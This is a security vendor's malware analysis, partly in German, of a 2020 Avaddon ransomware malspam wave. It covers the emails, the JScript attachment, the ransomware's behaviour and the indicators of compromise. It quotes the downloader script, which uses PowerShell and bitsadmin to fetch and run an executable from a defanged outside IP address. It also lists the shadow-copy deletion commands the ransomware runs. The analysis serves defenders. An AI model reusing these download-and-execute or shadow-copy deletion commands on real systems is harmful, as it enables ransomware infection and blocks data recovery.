Zusammenfassung

Am 03.06.2020 wurde berichtet [1], dass eine neue Ransomware, unter Avaddon bekannt, Partner für ihr Affiliate Programm suche, d.h. jemanden, der die Ransomware auf Opfersystemen installiert. Nur zwei Tage später, am 05.06.2020, wurde Malspam entdeckt, der die Avaddon-Ransomware verbreitete.

Der folgende Artikel gibt einen kurzen Überblick über die erste Welle von Avaddon-Malspam, die vom Hornetsecurity Security Lab analysiert wurde.

Hintergrund

Die erste E-Mail der Avaddon-Ransomware verwendet einen „Bildköder“:

Initial email

Das angehängte ZIP-Archiv enthält eine JSript-Datei, die bei Ausführung die Avaddon-Ransomware-Binärdatei herunterlädt und ausführt:

Content of ZIP

Aufgrund der analytisch-spezifischen Fachbegriffe erfolgt die Auswertung der Analyse auf Englisch.

Technical Analysis

In the following we will analyze the malicous email, the JScript downloader, and last but not least the downloaded Avaddon ransomware binary.

Emails

Emails are send from <name>[0-9]{2}@[0-9]{4}.com sender email addresses. Most of the four number dot com domains ([0-9]{4}.com) are parked domains without any SPF records, hence, blocking on policy grounds is not possible.

The malspam distributing Avaddon ransomware started on 2020-06-04 at around 14:00:00 UTC and are still lasting while writing this report:

Avaddon ransomware malspam wave timeline

The observed wave seems to target CA (Canada):

Avaddon ransomware wave recipient countries

The recipient industries seem to indicate a focus on education institutions at the receiving end of this wave:

Avaddon ransomware wave recipient industries

However, because this is only data from the first wave this should not be interpreted as the final targeting of the Avaddon ransomware.

JScript Downloader

The IMG000000.jpg.js.zip attachment contains the IMG000000.jpg.js JScript downloader:

Avaddon IMG000000.jpg.js JScript downloader

The Avaddon downloader script is simply:

var jsRun=new ActiveXObject('WSCRIPT.Shell');
jsRun.Run("cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('hxxp[:]//217.8.117[.]63/sava[.]exe','%temp%\\5203508738.exe');Start-Process '%temp%\\5203508738.exe'",false);
jsRun.Run("cmd.exe /c bitsadmin /transfer getitman /download /priority high hxxp[:]//217.8.117[.]63/sava[.]exe %temp%\\237502353.exe&start %temp%\\237502353.exe", false);

It uses both PowerShell and the BITSAdmin tool to download the sava.exe Avaddon ransomware file to %temp%\\5203508738.exe and %temp%\\237502353.exe respectively and execute it:

Avaddon ransomware downloader process tree

Avaddon Ransomware sava.exe

The Avaddon ransomware executable is not packed. However, its strings appear Base64 encoded using a custom alphabet. Imports are freely accessible. The Avaddon ransomware uses the Windows crypto API to generate an AES key, with which it then (presumably) encrypts the data. The generated AES key is then exported and encrypted via a previously from the ransomware binary imported key:

Avaddon ransomware generating AES key

Further the Avaddon ransomware deletes the volume shadow copies via wmic.exe SHADOWCOPY /nointeractive and vssadmin.exe Delete Shadows /All /Quiet.

After encryption the Avaddon ransomware changes the desktop background notifying the victim that files have been encrypted and where the instructions to pay the ransom are located:

Avaddon ransomware desktop background

The Avaddon ransomware leaves a file named [0-9]+-readme.html in every directory it encrypts. This file contains the instructions and an .onion link to the ransomware panel:

Avaddon ransomware ransom note

Victims are expected to copy their ransom ID to the linked .onion Tor hidden service website then received further instructions on how to pay the ransom and receive a decrypter.

Schlussfolgerung und Empfehlung

Wie aus der Analyse ersichtlich wird, kann die Zusammenarbeit von Malware-Gruppen die Verbreitung und Verteilung neuer Ransomware beschleunigen.

Hornetsecurity’s Spam and Malware Protection mit den höchsten Erkennungsraten auf dem Markt erkennt und blockiert bereits die dargestellte Bedrohung. Hornetsecurity’s Advanced Threat Protection erweitert diesen Schutz durch die Erkennung noch unbekannter Cybergefahren.

References

Indicators of Compromise (IOCs)

Hashes

SHA256FilenameDescription
05af0cf40590aef24b28fa04c6b4998b7ab3b7f26e60c507adb84f3d837778f2sava.exeAvaddon ransomware

URLs

  • hxxp[:]//217.8.117[.]63/sava[.]exe